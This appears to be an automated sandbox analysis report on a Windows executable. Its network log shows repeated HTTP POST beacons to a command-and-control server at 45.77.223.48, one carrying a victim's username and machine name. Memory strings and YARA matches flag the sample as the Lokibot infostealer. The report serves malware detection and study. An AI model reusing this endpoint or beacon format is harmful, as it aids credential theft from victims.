Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 46 00 44 00 44 00 34 00 32 00 45 00 45 00 31 00 38 00 38 00 45 00 39 00 33 00 31 00 34 00 33 00 37 00 46 00 34 00 46 00 42 00 45 00 32 00 43 00 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 46 00 44 00 44 00 34 00 32 00 45 00 45 00 31 00 38 00 38 00 45 00 39 00 33 00 31 00 34 00 33 00 37 00 46 00 34 00 46 00 42 00 45 00 32 00 43 00 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.223.48

Source: C:\Users\user\Desktop\SCB#89940578.exe

Code function: 2_2_00404ED4 recv,

2_2_00404ED4

Source: unknown

HTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 176Connection: close

Source: SCB#89940578.exe, 00000002.00000002.2812221693.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2811909354.00000000004A0000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://45.77.223.48/~blog/?ajax=posts.php
Source: SCB#89940578.exe, 00000002.00000002.2812221693.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.77.223.48/~blog/?ajax=posts.phpJ
Source: SCB#89940578.exe, 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2812617875.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.77.223.48/~blog/?feed=comments-rss2
Source: SCB#89940578.exe, 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2812617875.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.77.223.48/~blog/?feed=rss2
Source: SCB#89940578.exe, 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2812617875.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.77.223.48/~blog/index.php?rest_route=/
Source: SCB#89940578.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: SCB#89940578.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: SCB#89940578.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: SCB#89940578.exe, SCB#89940578.exe, 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: SCB#89940578.exe, 00000000.00000002.1708357533.00000000054E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.comJ
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: SCB#89940578.exe, 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2812617875.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.w.org/
Source: SCB#89940578.exe	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.SCB#89940578.exe.4756290.5.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.SCB#89940578.exe.473c270.6.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
